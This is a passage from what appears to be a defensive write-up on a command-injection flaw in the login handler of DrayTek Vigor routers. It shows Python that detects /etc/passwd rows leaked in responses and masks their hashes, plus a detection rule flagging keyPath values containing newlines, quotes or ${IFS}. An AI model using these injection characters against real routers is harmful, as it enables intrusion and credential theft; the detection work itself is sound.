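    rows with the hash field replaced, keeping placeholders such as 'x'.
    """
    if not PASSWD_ROW.search(response_body):
        return None
    text = response_body.split("<br />", 1)[0]   # drop the page's own HTML
    rows = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) >= 7:
            if parts[1] not in ("", "x", "*", "!"):
                parts[1] = "***"
            rows.append(":".join(parts))
    return "\n".join(rows)
```

Detection on the request side does not need the response at all: a POST to the login path whose keyPath decodes to anything containing a newline, quote or ${IFS} is already a finding, which is the rule worth putting in front of an unpatched Vigor 2960/3900/300B until it runs 1.5.1 or later.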